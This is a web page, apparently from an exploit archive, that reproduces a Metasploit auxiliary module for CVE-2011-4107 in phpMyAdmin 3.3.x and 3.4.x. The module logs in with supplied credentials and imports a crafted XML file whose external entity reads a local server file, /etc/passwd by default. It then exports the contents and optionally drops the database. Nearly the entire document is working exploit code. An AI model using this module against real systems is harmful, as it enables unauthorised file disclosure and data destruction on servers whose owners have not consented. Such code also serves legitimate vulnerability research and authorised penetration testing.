扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 |
# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection # Date: 12-01-2012 # Author: Marco Batista # Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/ # Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7 # CVE : CVE-2011-4107 require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name'=> 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection', 'Version' => '1.0', 'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server). The attacker must be logged in to MySQL via phpMyAdmin. Works on Windows and Linux Versions 3.3.X and 3.4.X}, 'References'=> [ [ 'CVE', '2011-4107' ], [ 'OSVDB', '76798' ], [ 'BID', '50497' ], [ 'URL', 'http://secforce.com/research/'], ], 'Author'=> [ 'Marco Batista' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(80), OptString.new('FILE', [ true,"File to read", '/etc/passwd']), OptString.new('USER', [ true,"Username", 'root']), OptString.new('PASS', [ false,"Password", 'password']), OptString.new('DB', [ true,"Database to use/create", 'hddaccess']), OptString.new('TBL', [ true,"Table to use/create and read the file to", 'files']), OptString.new('APP', [ true,"Location for phpMyAdmin URL", '/phpmyadmin']), OptString.new('DROP', [ true,"Drop database after reading file?", 'true']), ],self.class) end def loginprocess # HTTP GET TO GET SESSION VALUES getresponse = send_request_cgi({ 'uri' => datastore['APP']+'/index.php', 'method'=> 'GET', 'version' => '1.1', }, 25) if (getresponse.nil?) print_error("no response for #{ip}:#{rport}") elsif (getresponse.code == 200) print_status("Received #{getresponse.code} from #{rhost}:#{rport}") elsif (getresponse and getresponse.code == 302 or getresponse.code == 301) print_status("Received 302 to #{getresponse.headers['Location']}") else print_error("Received #{getresponse.code} from #{rhost}:#{rport}") end valuesget = getresponse.headers["Set-Cookie"] varsget = valuesget.split(" ") #GETTING THE VARIABLES NEEDED phpMyAdmin = varsget.grep(/phpMyAdmin/).last pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last # END HTTP GET # LOGIN POST REQUEST TO GET COOKIE VALUE postresponse = send_request_cgi({ 'uri' => datastore['APP']+'/index.php', 'method'=> 'POST', 'version' => '1.1', 'headers' =>{ 'Content-Type' => 'application/x-www-form-urlencoded', 'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}" }, 'data'=> 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1' }, 25) if (postresponse["Location"].nil?) print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}") tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last else tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last end valuespost = postresponse.headers["Set-Cookie"] varspost = valuespost.split(" ") #GETTING THE VARIABLES NEEDED pmaUser = varspost.grep(/pmaUser-1/).last pmaPass = varspost.grep(/pmaPass-1/).last return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue # END OF LOGIN POST REQUEST rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e print_error(e.message) rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e print_error(e.message) end def readfile(cookie,tokenvalue) #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN getfiles = send_request_cgi({ 'uri' => datastore['APP']+'/export.php', 'method'=> 'POST', 'version' => '1.1', 'headers' =>{ 'Cookie' => cookie }, 'data'=> 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data' }, 25) if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?) print_error("Error reading the file... not enough privilege? login error?") else print_status("#{getfiles.body}") end end def dropdatabase(cookie,tokenvalue) dropdb = send_request_cgi({ 'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false', 'method'=> 'GET', 'version' => '1.1', 'headers' =>{ 'Cookie' => cookie }, }, 25) print_status("Dropping database: "+datastore['DB']) end def run cookie,tokenvalue = loginprocess() print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}") craftedXML ="------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n" craftedXML << tokenvalue+"\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n" craftedXML << "server\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n" craftedXML << "Content-Type: text/xml\n\n" craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" craftedXML << "<!DOCTYPE ficheiro [\n" craftedXML << "<!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n" craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n" craftedXML << "<pma:structure_schemas>\n" craftedXML << "<pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n" craftedXML << "<pma:table name=\""+datastore['TBL']+"\">\n" craftedXML << "CREATE TABLE <code>"+datastore['TBL']+"</code> (<code>file</code> varchar(20000) NOT NULL);\n" craftedXML << "</pma:table>\n" craftedXML << "</pma:database>\n" craftedXML << "</pma:structure_schemas>\n" craftedXML << "<database name=\""+datastore['DB']+"\">\n" craftedXML << "<table name=\""+datastore['TBL']+"\">\n" craftedXML << "<column name=\"file\">&conteudo;</column>\n" craftedXML << "</table>\n" craftedXML << "</database>\n" craftedXML << "</pma_xml_export>\n\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n" craftedXML << "xml\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n" craftedXML << ",\n\n" craftedXML << "------WebKitFormBoundary3XPL01T--" print_status("Grabbing that #{datastore['FILE']} you want...") res = send_request_cgi({ 'uri' => datastore['APP']+'/import.php', 'method'=> 'POST', 'version' => '1.1', 'headers' =>{ 'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T', 'Cookie' => cookie }, 'data'=> craftedXML }, 25) readfile(cookie,tokenvalue) if (datastore['DROP'] == "true") dropdatabase(cookie,tokenvalue) else print_status("Database was not dropped: "+datastore['DB']) end end end |
体验盒子
